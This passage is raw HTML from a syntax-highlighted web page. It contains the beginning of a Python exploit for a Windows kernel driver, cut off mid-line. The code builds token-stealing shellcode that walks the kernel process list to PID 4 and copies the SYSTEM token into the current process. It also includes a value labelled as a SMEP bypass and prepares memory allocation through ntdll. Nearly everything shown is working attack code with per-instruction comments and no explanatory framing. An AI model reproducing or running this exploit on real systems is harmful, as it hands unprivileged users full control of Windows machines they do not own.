data-line=\"crayon-5a42caec3600a215264132-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-179\">179<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a42caec3600a215264132-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a42caec3600a215264132-186\">186<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-2\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">ctypes <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-3\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">time <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sleep<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-4\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">ctypes<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">wintypes <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">struct<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-7\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">random <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">choice<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-9\"><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">windll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">kernel32<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-10\"><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">windll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ntdll<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-12\"><span class=\"crayon-v\">MEM_COMMIT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00001000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-13\"><span class=\"crayon-v\">MEM_RESERVE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00002000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-14\"><span class=\"crayon-v\">PAGE_EXECUTE_READWRITE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000040<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-15\"><span class=\"crayon-v\">STATUS_SUCCESS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-17\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">get_ioctl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">choice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x80030004<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x80030008<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-20\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">alloc_shellcode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8221; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-22\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;allocates some shellcode<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-23\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) allocating shellcode @ 0x%x&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">base<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-25\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &#8211;[ setup]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000506f8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># bypass smep<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &#8211;[ setup]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x60&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># pushad<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x64xa1x24x01x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov eax, fs:[KTHREAD_OFFSET]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># I have to do it like this because windows is a little special<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># this just gets the EPROCESS. Windows 7 is 0x50, now its 0x80.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x8dx40x70&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># lea eax, [eax+0x70];<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x8bx40x10&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov eax, [eax+0x10];<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x89xc1&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov ecx, eax (Current _EPROCESS structure)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 10 rs2 x86 TOKEN_OFFSET = 0xfc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 07 sp1 x86 TOKEN_OFFSET = 0xf8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x8Bx98xfcx00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov ebx, [eax + TOKEN_OFFSET]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &#8211;[ copy system PID token]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;xbax04x00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov edx, 4 (SYSTEM PID)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x8bx80xb8x00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov eax, [eax + FLINK_OFFSET] &lt;-|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x2dxb8x00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># sub eax, FLINK_OFFSET&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x39x90xb4x00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># cmp [eax + PID_OFFSET], edx&nbsp;&nbsp;&nbsp;&nbsp; |<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x75xed&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># jnz&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -&gt;|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-51\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 10 rs2 x86 TOKEN_OFFSET = 0xfc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 07 sp1 x86 TOKEN_OFFSET = 0xf8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x8bx90xfcx00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov edx, [eax + TOKEN_OFFSET]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x89x91xfcx00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov [ecx + TOKEN_OFFSET], edx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &#8211;[ recover]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x61&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># popad<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x83xc4x0c&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># adjust the stack by 0xc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x31xc0&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># return NTSTATUS = STATUS_SUCCESS<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;xc3&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># filler<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x43&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argtypes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_ulong<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-66\"><span 